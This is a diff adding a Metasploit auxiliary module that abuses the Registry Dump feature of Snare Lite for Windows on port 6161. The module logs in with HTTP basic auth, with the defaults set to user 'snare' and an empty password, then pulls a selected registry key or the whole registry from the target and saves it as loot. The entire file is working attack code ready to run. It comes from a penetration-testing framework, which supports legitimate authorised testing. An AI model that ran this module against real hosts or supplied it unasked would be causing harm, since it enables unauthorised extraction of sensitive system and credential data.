|
| 1 | +## |
| 2 | +# This module requires Metasploit: http://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | + |
| 8 | +class MetasploitModule < Msf::Auxiliary |
| 9 | + include Msf::Exploit::Remote::HttpClient |
| 10 | + include Msf::Auxiliary::Report |
| 11 | + |
| 12 | + HttpFingerprint = { :pattern => [ /SNARE/ ] } |
| 13 | + |
| 14 | + def initialize(info = {}) |
| 15 | + super(update_info(info, |
| 16 | + 'Name' => 'Snare Lite for Windows Registry Access', |
| 17 | + 'Description' => %q{ |
| 18 | + This module uses the Registry Dump feature of the Snare Lite |
| 19 | + for Windows service on 6161/TCP to retrieve the Windows registry. |
| 20 | + The Dump Registry functionality is unavailable in Snare Enterprise. |
| 21 | +
|
| 22 | + Note: The Dump Registry functionality accepts only one connected |
| 23 | + client at a time. Requesting a large key/hive will cause the service |
| 24 | + to become unresponsive until the server completes the request. |
| 25 | + }, |
| 26 | + 'Platform' => 'win', |
| 27 | + 'Author' => [ 'Brendan Coles <bcoles[at]gmail.com>' ], |
| 28 | + 'License' => MSF_LICENSE, |
| 29 | + 'References' => |
| 30 | + [ |
| 31 | + [ 'URL', 'https://www.intersectalliance.com/wp-content/uploads/user_guides/Guide_to_Snare_for_Windows-4.2.pdf' ] |
| 32 | + ] |
| 33 | + )) |
| 34 | + |
| 35 | + register_options( |
| 36 | + [ |
| 37 | + Opt::RPORT(6161), |
| 38 | + OptString.new('USERNAME', [ false, 'The username for Snare remote access', 'snare' ]), |
| 39 | + OptString.new('PASSWORD', [ false, 'The password for Snare remote access', '' ]), |
| 40 | + OptString.new('REG_DUMP_KEY', [ false, 'Retrieve this registry key and all sub-keys', 'HKLM\\HARDWARE\\DESCRIPTION\\System' ]), |
| 41 | + OptBool.new('REG_DUMP_ALL', [false, 'Retrieve the entire Windows registry', false]), |
| 42 | + OptInt.new('TIMEOUT', [true, 'Timeout in seconds for downloading each registry key/hive', 300]) |
| 43 | + ], self.class) |
| 44 | + end |
| 45 | + |
| 46 | + def run |
| 47 | + datastore['REG_DUMP_ALL'] ? dump_all : dump_key(datastore['REG_DUMP_KEY']) |
| 48 | + end |
| 49 | + |
| 50 | + # |
| 51 | + # Retrieve the supplied registry key |
| 52 | + # |
| 53 | + def dump_key(reg_key) |
| 54 | + if reg_key.blank? |
| 55 | + fail_with(Failure::BadConfig, "#{peer} - Please supply a valid key name") |
| 56 | + end |
| 57 | + hive = reg_key.split('\\').first |
| 58 | + key = reg_key.split('\\')[1..-1].join('\\\\') |
| 59 | + if hive !~ /\A[A-Z0-9_]+\z/i |
| 60 | + fail_with(Failure::BadConfig, "#{peer} - Please supply a valid key name") |
| 61 | + end |
| 62 | + vars_get = { 'str_Base' => hive } |
| 63 | + if key.eql?('') |
| 64 | + print_status("#{peer} - Retrieving registry hive '#{hive}'...") |
| 65 | + else |
| 66 | + print_status("#{peer} - Retrieving registry key '#{hive}\\\\#{key}'...") |
| 67 | + vars_get['str_SubKey'] = key |
| 68 | + end |
| 69 | + res = send_request_cgi({ |
| 70 | + 'uri' => normalize_uri('RegDump'), |
| 71 | + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), |
| 72 | + 'vars_get' => vars_get |
| 73 | + }, datastore['TIMEOUT']) |
| 74 | + if !res |
| 75 | + fail_with(Failure::Unreachable, "#{peer} - Connection failed") |
| 76 | + elsif res.code && res.code == 401 |
| 77 | + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") |
| 78 | + elsif res.code && res.code == 404 |
| 79 | + fail_with(Failure::NotVulnerable, "#{peer} - Dump Registry feature is unavailable") |
| 80 | + elsif res.code && res.code == 200 && res.body && res.body =~ /\AKEY: / |
| 81 | + print_good("#{peer} - Retrieved key successfully (#{res.body.length} bytes)") |
| 82 | + elsif res.code && res.code == 200 && res.body && res.body =~ /the supplied subkey cannot be found/ |
| 83 | + fail_with(Failure::NotFound, "#{peer} - The supplied registry key does not exist") |
| 84 | + else |
| 85 | + fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)") |
| 86 | + end |
| 87 | + path = store_loot( |
| 88 | + 'snare.registry', |
| 89 | + 'text/plain', |
| 90 | + datastore['RHOST'], |
| 91 | + res.body, |
| 92 | + reg_key.gsub(/[^\w]/, '_').downcase |
| 93 | + ) |
| 94 | + print_good("File saved in: #{path}") |
| 95 | + end |
| 96 | + |
| 97 | + # |
| 98 | + # Retrieve list of registry hives |
| 99 | + # |
| 100 | + def retrieve_hive_list |
| 101 | + hives = [] |
| 102 | + print_status("#{peer} - Retrieving list of registry hives ...") |
| 103 | + res = send_request_cgi( |
| 104 | + 'uri' => normalize_uri('RegDump'), |
| 105 | + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) |
| 106 | + ) |
| 107 | + if !res |
| 108 | + fail_with(Failure::Unreachable, "#{peer} - Connection failed") |
| 109 | + elsif res.code && res.code == 401 |
| 110 | + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") |
| 111 | + elsif res.code && res.code == 404 |
| 112 | + fail_with(Failure::NotVulnerable, "#{peer} - Dump Registry feature is unavailable") |
| 113 | + elsif res.code && res.code == 200 && res.body && res.body =~ /RegDump\?str_Base/ |
| 114 | + hives = res.body.scan(%r{<li><a href="\/RegDump\?str_Base=([a-zA-Z0-9_]+)">}).flatten |
| 115 | + vprint_good("#{peer} - Found #{hives.length} registry hives (#{hives.join(', ')})") |
| 116 | + else |
| 117 | + fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)") |
| 118 | + end |
| 119 | + hives |
| 120 | + end |
| 121 | + |
| 122 | + # |
| 123 | + # Retrieve all registry hives |
| 124 | + # |
| 125 | + def dump_all |
| 126 | + hives = retrieve_hive_list |
| 127 | + if hives.blank? |
| 128 | + print_error("#{peer} - Found no registry hives") |
| 129 | + return |
| 130 | + end |
| 131 | + hives.each { |hive| dump_key(hive) } |
| 132 | + end |
| 133 | +end |
0 commit comments